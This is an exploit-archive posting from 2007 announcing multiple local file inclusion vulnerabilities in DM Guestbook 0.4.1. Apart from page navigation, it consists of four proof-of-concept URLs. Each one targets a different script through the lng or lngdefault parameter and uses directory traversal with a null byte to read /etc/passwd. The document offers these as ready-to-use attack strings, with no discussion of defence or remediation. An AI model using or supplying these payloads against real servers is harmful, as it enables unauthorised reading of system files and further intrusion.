Home / os / solaris

dmguest-lfi.txt

Posted on 02 November 2007

# DM Guestbook <= 0.4.1 Multiple Local File Include Vulnerabilities # http://sourceforge.net/project/showfiles.php?group_id=101364 /guestbook.0.4.1/ # POC : # /guestbook.php?lng=../../../../../../../etc/passwd%00 # /admin/admin.guestbook.php?lng=../../../../../../../etc/passwd%00 # /auto/glob_new.php?lng=../../../../../../../etc/passwd%00 # /auto/ch_lng.php?lngdefault=../../../../../../../etc/passwd%00

 

TOP